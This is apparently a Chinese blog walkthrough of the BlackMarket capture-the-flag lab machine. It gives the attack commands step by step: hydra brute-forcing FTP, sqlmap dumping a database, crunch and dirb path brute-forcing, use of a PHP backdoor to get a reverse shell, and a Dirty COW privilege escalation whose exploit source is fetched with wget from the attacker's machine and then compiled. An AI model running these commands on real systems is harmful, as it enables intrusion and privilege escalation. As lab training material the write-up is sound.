blackmarket靶机

目录扫描

指纹识别

访问web服务80端口,发现flag1{Q0lBIC0gT3BlcmF0aW9uIFRyZWFkc3RvbmU=}

对数据进行base64解密

Google搜索 https://bourne.fandom.com/wiki/Operation_Treadstone

利用cewl爬取网站生成关联词字典,然后使用hydra爆破21端口

cewl Operation Treadstone | The Bourne Directory | Fandom -d 1 -w BlackMarket_dic.txt

hydra -L BlackMarket_dic.txt -P BlackMarket_dic.txt ftp://192.168.1.2 -vV

得到账号密码nicky:CIA

拿到账号密码进行ftp登录

cd ftp/ImpFiles

more IMP.txt发现flag2{Q29uZ3JhdHMgUHJvY2VlZCBGdXJ0aGVy}

接着回到web端口

尝试弱口令---破解出账号密码supplier:supplier

拼接admin

修改订单时抓取数据包sqlmap测试漏洞

数据库爆破

sqlmap -r 1.txt --dbs --batch

sqlmap -r 1.txt -D BlackMarket --tables --batch

sqlmap -r 1.txt -D BlackMarket -T flag --dump --batch

发现flag3 Find Jason Bourne Email access

添加用户越权漏洞发现flag4

添加一个用户

抓取修改数据包

发现flag4{bm90aGluZyBpcyBoZXJl}

名字为Jbourne,密码为?????

登陆之前扫出的目录/squirrelmail

发现flag5{RXZlcnl0aGluZyBpcyBlbmNyeXB0ZWQ=}

quipqiup - cryptoquip and cryptogram solver

拼接/kgbbackdoor

1.sql数据库中有一个eworkshop的数据库

利用crunch生成字典进行爆破。

crunch 9 9-t @workshop > BlackMarket_BackdoorPath.txt

2.使用dirb进行爆破->有个路径

dirb http://192.168.1.4/home/kali/BlackMarket_BackdoorPath.txt

拼接/vworkshop,拼接之前的到的提示/kgbbackdoor/PassPass.jpg

下载本地用010Editor工具分析

发现pass

Pass = 5215565757312090656

十进制:5215565757312090656

十六进制:4861696c4b474400

ASCii: HailKGB

得到密码为:HailKGB

访问后门http://192.168.1.2/vworkshop/kgbbackdoor/backdoor.php

输入得到的密码得到flag6{Um9vdCB0aW1l}

点击network尝试反弹shell

kali开启监听

成功反弹shell

# 获取交互式shell

python -c "import pty;pty.spawn('/bin/bash')"

查询系统版本

uname -a 版本为4.4.0

使用脏牛提权

searchsploit dirty

searchsploit -m linux/local/40616.c # 将exp复制到kali

python -m http.server 8001 # 开启临时服务

cd /tmp

wget http://192.168.1.4:8000/40616.c

gcc 40616.c -o cowroot -pthread # 编译.c文件

ls -al

提权成功

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值